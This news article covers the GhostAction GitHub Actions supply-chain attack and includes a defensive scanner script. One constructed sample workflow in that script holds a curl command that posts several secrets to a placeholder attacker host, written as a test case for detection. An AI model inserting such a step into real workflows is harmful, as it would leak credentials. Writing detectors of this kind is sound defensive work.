GhostAction: GitHub supply-chain attack exposes 3,325 secrets across hundreds of repositories

A new supply chain attack targeting GitHub workflows, dubbed GhostAction, has compromised about 3,325 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub tokens, Cloudflare and AWS keys, researchers say.

The attack was uncovered by GitGuardian researchers, who noted that the first signs of compromise on the FastUUID project appeared on 2 September 2025, after attackers gained control of maintainer accounts and inserted malicious GitHub Actions workflows that run on push or on manual dispatch. GitGuardian has published a detailed analysis of the incident.

The malicious workflows exfiltrate secrets from the project’s GitHub Actions environment to an external endpoint controlled by the attacker via a curl POST request, according to GitGuardian’s analysis.

In the FastUUID case, the attackers stole the project’s PyPI token, though GitGuardian said no malicious packages were released on PyPI before detection and remediation.

Initial tracing showed the GhostAction operation was broader than a single repository. The researchers say the campaign injected similar commits into at least 817 repositories, all directing secrets to the same exfiltration endpoint hosted at an external domain. The attackers enumerated secret names from legitimate workflows and hardcoded them into their own workflows to harvest multiple secret types.
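The pattern described above (a workflow step that references several repository secrets and hands them to curl for a POST to a host outside the usual publishing infrastructure) is something a repository owner can check for directly. The following scanner is an added example written for this article; it is not GitGuardian's tooling and not code from any affected project. It parses workflow text with simple regular expressions rather than a YAML library so it runs offline, and the two sample workflows, the `exfil.example.invalid` domain and the `TRUSTED_HOSTS` allow-list are constructed placeholders.

```python
import re
from dataclasses import dataclass

# Constructed sample: a normal publish step that uses one secret and no outbound HTTP tool.
BENIGN_WORKFLOW = """\
name: publish
on: [push]
jobs:
  release:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Publish to PyPI
        run: |
          pip install twine
          twine upload dist/* -u __token__ -p "${{ secrets.PYPI_TOKEN }}"
"""

# Constructed sample mirroring the article's description: several secret names hardcoded
# into one step and POSTed with curl to an external host (placeholder domain).
SUSPICIOUS_WORKFLOW = """\
name: ci
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        run: |
          curl -X POST -d "pypi=${{ secrets.PYPI_TOKEN }}&npm=${{ secrets.NPM_TOKEN }}&aws=${{ secrets.AWS_SECRET_ACCESS_KEY }}" https://exfil.example.invalid/collect
"""

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
HTTP_TOOL = re.compile(r"\b(curl|wget|Invoke-WebRequest|iwr)\b")
STEP_START = re.compile(r"^\s*-\s+\w[\w-]*:")  # '- uses:', '- name:', '- run:' list items

# Hosts a publish workflow legitimately talks to (assumed allow-list; extend per organisation).
TRUSTED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org", "registry.npmjs.org"}


@dataclass
class Finding:
    step: str
    secrets: list
    hosts: list
    reason: str


def split_steps(text):
    """Split workflow text into per-step chunks using the '- key:' list markers."""
    steps, current = [], []
    for line in text.splitlines():
        if STEP_START.match(line):
            if current:
                steps.append("\n".join(current))
            current = [line]
        elif current:
            current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps


def step_label(step):
    m = re.search(r"name:\s*(.+)", step)
    return m.group(1).strip() if m else step.strip().splitlines()[0]


def scan_workflow(text, max_secrets_per_step=2):
    """Flag steps that send secrets to untrusted hosts or reference unusually many secrets."""
    findings = []
    for step in split_steps(text):
        secrets = sorted(set(SECRET_REF.findall(step)))
        if not secrets:
            continue
        hosts = sorted(set(URL_HOST.findall(step)))
        untrusted = [h for h in hosts if h not in TRUSTED_HOSTS]
        if HTTP_TOOL.search(step) and untrusted:
            findings.append(Finding(step_label(step), secrets, untrusted,
                                    "secrets referenced alongside an HTTP call to an untrusted host"))
        elif len(secrets) > max_secrets_per_step:
            findings.append(Finding(step_label(step), secrets, hosts,
                                    "unusually many distinct secrets referenced in one step"))
    return findings


if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("suspicious", SUSPICIOUS_WORKFLOW)):
        print(label, scan_workflow(wf) or "no findings")
```

The first rule is the high-confidence one: a step that both expands `${{ secrets.* }}` and invokes an HTTP client against a host outside the allow-list. The second rule is a weaker heuristic that catches the harvesting shape on its own (many distinct secrets in a single step) even when the exfiltration URL is obfuscated; tune `max_secrets_per_step` to the repository's real publishing steps to keep false positives down. Running it over every file under `.github/workflows/` on each push, and on a schedule, turns the article's indicator into a repeatable check.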

When the full scope was revealed on 5 September, GitGuardian opened issues in 573 affected repositories and notified the security teams at GitHub, npm and PyPI. By that point, around 100 GitHub repositories had already detected the compromise and rolled back the malicious changes.

Exfiltration activity ceased not long after the discovery, with the exfiltration domain reportedly ceasing to resolve shortly thereafter. GitGuardian estimates the GhostAction campaign stole roughly 3,325 secrets, including PyPI and npm tokens, DockerHub tokens, GitHub tokens, Cloudflare API tokens, AWS access keys and database credentials.

Researchers warned that at least nine npm packages and 15 PyPI packages are directly affected and could see malicious or trojanized versions released until their maintainers revoke leaked credentials. “This analysis reveals compromised tokens across multiple package ecosystems, including Rust crates and npm packages,” GitGuardian said in a post summarising the findings.

The company noted that while some practical and technical similarities exist with a prior campaign, GitGuardian does not believe there is a confirmed connection to the earlier s1ngularity operation.